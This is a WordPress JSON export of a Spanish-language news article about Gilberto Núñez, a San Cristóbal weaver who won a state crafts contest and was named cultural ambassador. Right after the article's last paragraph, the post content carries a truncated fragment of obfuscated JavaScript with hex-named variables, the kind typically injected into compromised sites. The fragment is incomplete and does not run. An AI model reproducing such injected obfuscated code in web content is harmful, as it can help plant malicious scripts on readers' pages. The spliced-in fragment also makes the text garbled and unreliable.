{"id":12970,"date":"2023-12-01T01:50:03","date_gmt":"2023-12-01T01:50:03","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=12970"},"modified":"2023-12-01T01:50:04","modified_gmt":"2023-12-01T01:50:04","slug":"marca-chiapas-designa-a-maestro-artesano-como-embajador-cultural","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=12970","title":{"rendered":"Marca Chiapas designa a maestro artesano como Embajador Cultural"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/12\/FB_IMG_1701395354897-1024x768.jpg\" alt=\"\" class=\"wp-image-12971\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/12\/FB_IMG_1701395354897-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/12\/FB_IMG_1701395354897-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/12\/FB_IMG_1701395354897-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/12\/FB_IMG_1701395354897.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal San Crist\u00f3bal de Las Casas.- Adem\u00e1s de hablar obtenido el primer lugar en el XXXIX Concurso Estatal de Artesan\u00edas \u201cFray Bartolom\u00e9 de Las Casas\u201d, celebrado en la capital Tuxtla Guti\u00e9rrez, por la confecci\u00f3n de un rebozo en telar de pedal, el maestro artesano Gilberto N\u00fa\u00f1ez, tambi\u00e9n recibi\u00f3 el nombramiento de embajador cultural, que por primera vez otorga el Consejo Regulador de la Estrategia Marca Chiapas.Gilberto N\u00fa\u00f1ez fue designado embajador cultural tras ser ganador en el Concurso Estatal de Artesan\u00edas \u201cFray Bartolom\u00e9 de Las Casas\u201d, cuyo reconocimiento le ser\u00e1 entregado en los pr\u00f3ximos d\u00edas. Recientemente particip\u00f3 tambi\u00e9n por segunda ocasi\u00f3n en el Encuentro de Arte Textil Mexicano, edici\u00f3n 2023, denominado \u201cOriginal M\u00e9xico\u201d.Este encuentro se efectu\u00f3 en el Complejo Cultural Los Pinos, donde el representante de San Crist\u00f3bal tuvo la oportunidad de exponer y vender sus creaciones realizadas con telar de pedal. Un oficio que est\u00e1 siendo rescatado para dar a conocer la riqueza cultural con que cuenta San Crist\u00f3bal de Las Casas.Gilberto desde hace m\u00e1s de 12 a\u00f1os imparte el taller de tejido en telar de pedal y te\u00f1ido con tintes naturales, en el Centro Cultural El Carmen de esta ciudad. En 1997 particip\u00f3 por primera vez en el Concurso Estatal de Artesan\u00edas \u201cFray Bartolom\u00e9 de Las Casas\u201d en su XIV edici\u00f3n, en donde obtuvo el 3er. lugar en la rama de Textiler\u00eda en telar de pedal.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal San Crist\u00f3bal de Las Casas.- Adem\u00e1s de hablar obtenido el primer lugar en el XXXIX Concurso Estatal de Artesan\u00edas \u201cFray Bartolom\u00e9 de Las Casas\u201d, celebrado en la capital Tuxtla Guti\u00e9rrez, por la confecci\u00f3n de un rebozo en telar de pedal, el maestro artesano Gilberto N\u00fa\u00f1ez, tambi\u00e9n recibi\u00f3 el nombramiento de embajador cultural, &hellip;<\/p>\n","protected":false},"author":2,"featured_media":12971,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-12970","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12970","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=12970"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12970\/revisions"}],"predecessor-version":[{"id":12972,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12970\/revisions\/12972"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/12971"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=12970"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=12970"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=12970"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}